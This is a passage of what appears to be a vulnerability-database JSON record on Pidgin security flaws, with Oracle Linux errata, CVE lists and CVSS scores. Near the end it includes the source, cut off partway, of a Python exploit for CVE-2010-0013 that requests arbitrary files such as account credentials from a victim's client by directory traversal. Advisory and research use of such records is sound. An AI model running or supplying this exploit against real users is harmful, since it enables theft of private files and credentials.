"4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "libpurple-2.6.5-1.el4.1.ia64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "pidgin-2.6.5-1.el4.1.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "finch-2.6.5-1.el4.1.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "pidgin-2.6.5-1.el4.1.ia64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.ia64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.ia64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "finch-2.6.5-1.el4.1.ia64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "finch-2.6.5-1.el4.1.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.ia64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "libpurple-2.6.5-1.el4.1.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "pidgin-2.6.5-1.el4.1.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "finch-devel-2.6.5-1.el4.1.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "finch-devel-2.6.5-1.el4.1.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.ia64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "finch-devel-2.6.5-1.el4.1.ia64.rpm", "packageName": "finch-devel", "operator": "lt"}], "description": "[2.6.5-1.el4.1]\n- 2.6.5\n- CVE-2010-0013\n- Other bug fixes\n- build with old gcc\n[2.6.4-4]\n- temporarily disable evolution integration in F13 until it is fixed\n[2.6.4-2]\n- disable SILC in EL6 builds\n[2.6.4-1]\n- 2.6.4 ", "edition": 3, "reporter": "Oracle", "published": "2010-01-14T00:00:00", "title": "pidgin security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0013"], "modified": "2010-01-14T00:00:00", "id": "ELSA-2010-0044", "href": "http://linux.oracle.com/errata/ELSA-2010-0044.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T01:45:08", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "libpurple-perl-2.6.6-5.el4_8.ia64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "pidgin-2.6.6-5.el4_8.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "finch-2.6.6-5.el4_8.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "finch-2.6.6-5.el4_8.ia64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "src", "packageFilename": "pidgin-2.6.6-5.el4_8.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "src", "packageFilename": "pidgin-2.6.6-5.el4_8.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "src", "packageFilename": "pidgin-2.6.6-5.el4_8.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.6.6-5.el4_8.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "libpurple-devel-2.6.6-5.el4_8.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "libpurple-2.6.6-5.el4_8.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "pidgin-2.6.6-5.el4_8.ia64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "pidgin-devel-2.6.6-5.el4_8.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "finch-devel-2.6.6-5.el4_8.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "pidgin-devel-2.6.6-5.el4_8.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "pidgin-2.6.6-5.el4_8.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "libpurple-perl-2.6.6-5.el4_8.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "pidgin-perl-2.6.6-5.el4_8.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "libpurple-2.6.6-5.el4_8.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "libpurple-tcl-2.6.6-5.el4_8.ia64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "libpurple-2.6.6-5.el4_8.ia64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "libpurple-perl-2.6.6-5.el4_8.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "libpurple-devel-2.6.6-5.el4_8.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "finch-devel-2.6.6-5.el4_8.ia64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "finch-2.6.6-5.el4_8.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "pidgin-devel-2.6.6-5.el4_8.ia64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "finch-devel-2.6.6-5.el4_8.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "pidgin-perl-2.6.6-5.el4_8.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "pidgin-perl-2.6.6-5.el4_8.ia64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "libpurple-tcl-2.6.6-5.el4_8.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "libpurple-devel-2.6.6-5.el4_8.ia64.rpm", "packageName": "libpurple-devel", "operator": "lt"}], "description": "[2.6.6-5]\n- Add patch for CVE-2010-1624 (RH bug #644153).\n[2.6.6-4]\n- Initial patch for CVE-2010-3711 was incomplete. Here's the rest.\n[2.6.6-3]\n- Add patch for CVE-2010-3711 (RH bug #644153). ", "edition": 3, "reporter": "Oracle", "published": "2010-10-21T00:00:00", "title": "pidgin security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1624", "CVE-2010-3711"], "modified": "2010-10-21T00:00:00", "id": "ELSA-2010-0788", "href": "http://linux.oracle.com/errata/ELSA-2010-0788.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:39:13", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "pidgin-perl-2.7.9-3.el6.i686.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "finch-devel-2.7.9-3.el6.i686.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "finch-devel-2.7.9-3.el6.i686.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "pidgin-devel-2.7.9-3.el6.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "finch-2.7.9-3.el6.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "pidgin-perl-2.7.9-3.el6.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "pidgin-2.7.9-3.el6.i686.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.7.9-3.el6.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "pidgin-docs-2.7.9-3.el6.x86_64.rpm", "packageName": "pidgin-docs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "pidgin-devel-2.7.9-3.el6.i686.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "pidgin-devel-2.7.9-3.el6.i686.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "finch-devel-2.7.9-3.el6.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "pidgin-2.7.9-3.el6.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "finch-2.7.9-3.el6.i686.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "finch-2.7.9-3.el6.i686.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "src", "packageFilename": "pidgin-2.7.9-3.el6.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "src", "packageFilename": "pidgin-2.7.9-3.el6.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "libpurple-tcl-2.7.9-3.el6.i686.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "libpurple-2.7.9-3.el6.i686.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "libpurple-2.7.9-3.el6.i686.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "libpurple-devel-2.7.9-3.el6.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "libpurple-perl-2.7.9-3.el6.i686.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "pidgin-docs-2.7.9-3.el6.i686.rpm", "packageName": "pidgin-docs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "libpurple-2.7.9-3.el6.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "libpurple-perl-2.7.9-3.el6.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "libpurple-devel-2.7.9-3.el6.i686.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "libpurple-devel-2.7.9-3.el6.i686.rpm", "packageName": "libpurple-devel", "operator": "lt"}], "description": "[2.7.9-3.el6]\n- Add patch for RH bug #684685 (zero-out crypto keys before freeing).\n[2.7.9-2.el6]\n- Add patch for CVE-2011-1091 (RH bug #683031).\n[2.7.9-1.el6]\n- Update to 2.7.9 (RH bug #616917).\n- Remove patches now included upstream:\n pidgin-2.6.6-clientLogin-proxy-fix.patch\n pidgin-2.6.6-clientLogin-use-https.patch\n pidgin-2.6.6-CVE-2010-1624.patch\n pidgin-2.6.6-CVE-2010-3711.patch\n- Disable the translation updates patch. It doesn't apply anymore and\n will have to be redone. Saving the patch for now in case some parts\n are still useful to translators.", "edition": 3, "reporter": "Oracle", "published": "2011-05-28T00:00:00", "title": "pidgin security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-1091", "CVE-2010-1624", "CVE-2011-4922", "CVE-2010-3711"], "modified": "2011-05-28T00:00:00", "id": "ELSA-2011-0616", "href": "http://linux.oracle.com/errata/ELSA-2011-0616.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:13:59", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "BUGTRAQ ID: 38294\r\nCVE ID: CVE-2010-0277,CVE-2010-0420,CVE-2010-0423\r\n\r\nPidgin\u662f\u652f\u6301\u591a\u79cd\u534f\u8bae\u7684\u5373\u65f6\u901a\u8baf\u5ba2\u6237\u7aef\u3002\r\n\r\nPidgin\u7684MSN\u534f\u8bae\u5b9e\u73b0\u5904\u7406MSNSLP\u9080\u8bf7\u7684\u65b9\u5f0f\u5b58\u5728\u8f93\u5165\u8fc7\u6ee4\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u53d1\u9001\u7279\u5236\u7684INVITE\u8bf7\u6c42\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\uff08\u5185\u5b58\u7834\u574f\u548c Pidgin\u5d29\u6e83\uff09\u3002\r\n\r\nFinch\u7684XMPP\u804a\u5929\u5b9e\u73b0\u5728\u4f7f\u7528\u591a\u7528\u6237\u4f1a\u8bdd\u65f6\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\u3002\u5982\u679c\u591a\u7528\u6237\u804a\u5929\u4f1a\u8bdd\u4e2d\u7684Finch\u7528\u6237\u8981\u5c06\u6635\u79f0\u66f4\u6539\u4e3a\u5305\u542b\u6709HTML br\u5143\u7d20\uff0c\u5c31\u4f1a\u5bfc\u81f4Finch\u5d29\u6e83\u3002\r\n\r\nPidgin\u5904\u7406\u8868\u60c5\u7b26\u56fe\u5f62\u7684\u65b9\u5f0f\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u76f8\u4e92\u901a\u8baf\u4e2d\u5411\u53d7\u5bb3\u7528\u6237\u53d1\u9001\u5927\u91cf\u7684\u8868\u60c5\u7b26\u56fe\u5f62\uff0c\u5bfc\u81f4\u8fc7\u591a\u7684CPU\u4f7f\u7528\u7387\u3002\n\nPidgin &lt; 2.6.6\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2010:0115-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2010:0115-01\uff1aModerate: pidgin security update\r\n\u94fe\u63a5\uff1ahttps://www.redhat.com/support/errata/RHSA-2010-0115.html\r\n\r\nPidgin\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://developer.pidgin.im/wiki/ChangeLog", "reporter": "Root", "published": "2010-03-02T00:00:00", "title": "Pidgin\u591a\u4e2a\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0277", "CVE-2010-0420", "CVE-2010-0423"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2010-03-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19202", "id": "SSV:19202", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T12:19:02", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "type": "seebug", "title": "Pidgin MSN <= 2.6.4 File Download Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0013"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67539", "id": "SSV:67539", "sourceData": "\n #!/usr/bin/env python \r\n&#34;&#34;&#34;\r\nPidgin MSN &#60;= 2.6.4 file download vulnerability\r\n\r\n19 January 2010\r\n\r\nMathieu GASPARD (gaspmat@gmail.com)\r\n\r\n\r\nDescription:\r\n\t\tPidgin is a multi-protocol Instant Messenger.\r\n\r\n\t\tThis is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi.\r\n\t\tThe issue is caused by an error in the MSN custom smiley feature when processing emoticon requests, \r\n\t\twhich could allow attackers to disclose the contents of arbitrary files via directory traversal attacks.\r\n\r\nAffected versions :\r\n\t\tPidgin &#60;= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library.\r\n\t\tPlugin msn-pecan 0.1.0-rc2 (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to date\r\n\r\nPlateforms :\r\n\t\tWindows, Linux, Mac\r\n\r\nFix :\r\n\t\tFixed in Pidgin 2.6.5\r\n\t\tUpdate to the latest version : http://www.pidgin.im/download/\r\n\r\nReferences :\r\n\t\t[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013\r\n\t\t[2] http://www.pidgin.im/news/security/?id=42\r\n\r\nUsage :\r\n\t\tYou need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn\r\n\t\tpython pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l]\r\n\r\nExample : \r\n# python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml]\r\n\r\n\t\t***********************************************************\r\n\r\n\t\tPidgin MSN file download vulnerability (CVE-2010-0013)\r\n\r\n\t\tUsage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\r\n\r\n\t\t***********************************************************\r\n\r\n\t\tPlease enter the password for the account &#34;foo@hotmail.com&#34;\r\n\t\tPassword:\r\n\t\t[+] Connecting to server\r\n\t\t[+] Authentication in progress\r\n\t\t[+] Synchronisation in progress\r\n\t\t[+] OK, all done, ready to proceed\r\n\t\t[+] Sending request for file &#34;../accounts.xml&#34; to &#34;victim@hotmail.com&#34;\r\n\t\t[+] Using session_id 974948028\r\n\t\tCurrent : 3606, total: 3881 (92%)\r\n\t\t[+] Got an answer from the contact\r\n\t\t----------------\r\n\t\t&#60;?xml version=&#39;1.0&#39; encoding=&#39;UTF-8&#39; ?&#62;\r\n\r\n\t\t&#60;account version=&#39;1.0&#39;&#62;\r\n\t\t........\r\n&#34;&#34;&#34;\r\n\r\n\r\nimport warnings\r\nwarnings.simplefilter(&#34;ignore&#34;,DeprecationWarning)\r\nimport os\r\nimport sys\r\ntry:\r\n\timport pymsn\r\nexcept ImportError:\r\n\tprint &#34;Pymsn couldn&#39;t be loaded&#34;\r\n\tprint &#34;On debian-like systems, the package is python-msn&#34;\r\n\tsys.exit(-1)\r\nimport gobject\r\nimport logging\r\nimport getpass\r\nimport hashlib\r\nfrom optparse import OptionParser\r\nimport signal\r\nimport time\r\n\r\nSERVER_ADDRESS = &#39;messenger.hotmail.com&#39;\r\nSERVER_PORT = 1863\r\nFD_OUT = sys.stdout\r\nMAINLOOP = None\r\n# seconds after which, if we didn&#39;t get an answer, we quit\r\nTIMEOUT = 5\r\n\r\nglobal_client = None\r\n\r\ndef quit():\r\n\tMAINLOOP.quit()\r\n\tsys.exit(0)\r\n\t\r\n\r\ndef check_if_succeeds():\r\n\t# if False, we didn&#39;t get a chunk so we won&#39;t get any file, so we quit\r\n\tif global_client.GOT_CONTROL_BLOB == False:\r\n\t\tprint &#34;[+] Didn&#39;t get an answer from the client after %d seconds, it&#39;s likely not vulnerable or the file requested doesn&#39;t exist/is not accessible&#34;%TIMEOUT\r\n\t\tprint &#34;[+] Exiting&#34;\r\n\t\tglobal_client.quit()\r\n\r\n# called when we get the result data, after our request\r\ndef handle_answer(object, client):\r\n\tprint &#34;\\n[+] Got an answer from the contact&#34;\r\n\td = object._data\r\n\tdata = d.read()\r\n\tlength = len(data)\r\n\tFD_OUT.write(data)\r\n\t# if we wrote output to stdout, don&#39;t close it\r\n\tif FD_OUT != sys.stdout:\r\n\t\tFD_OUT.close()\r\n\t\tprint &#34;[+] Wrote %d bytes to file&#34;%length\r\n\tclient.end = time.time()\r\n\tduration = client.end - client.begin\r\n\tprint &#34;[+] Download lasted %d seconds at %d bytes/s &#34;%(duration,(length/duration))\r\n\tclient.quit()\r\n\r\ndef my_on_chunk_recv(transport, chunk):\r\n\tglobal_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk)\r\n\tsession_id = chunk.header.session_id\r\n\tblob_id = chunk.header.blob_id\r\n\tif session_id == global_client.session_id:\r\n\t\t# first blob is control, we &#34;squeeze&#34; it and keep only the second one\r\n\t\tif global_client.GOT_CONTROL_BLOB == False:\r\n\t\t\t#print &#34;Got Control blob in our connection (session_id : %d, blob_id: %d)&#34;%(session_id, blob_id)\r\n\t\t\tglobal_client.GOT_CONTROL_BLOB = True\r\n\t\telse:\r\n\t\t\t# if connections is complete, session_id is removed from data_blobs so we have to check before accessing it\r\n\t\t\tif global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id):\r\n\t\t\t\tcurrent_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id]\r\n\t\t\t\tprint &#34;Current : %d, total: %d (%d%%)\\r&#34;%(current_blob.current_size, current_blob.total_size, 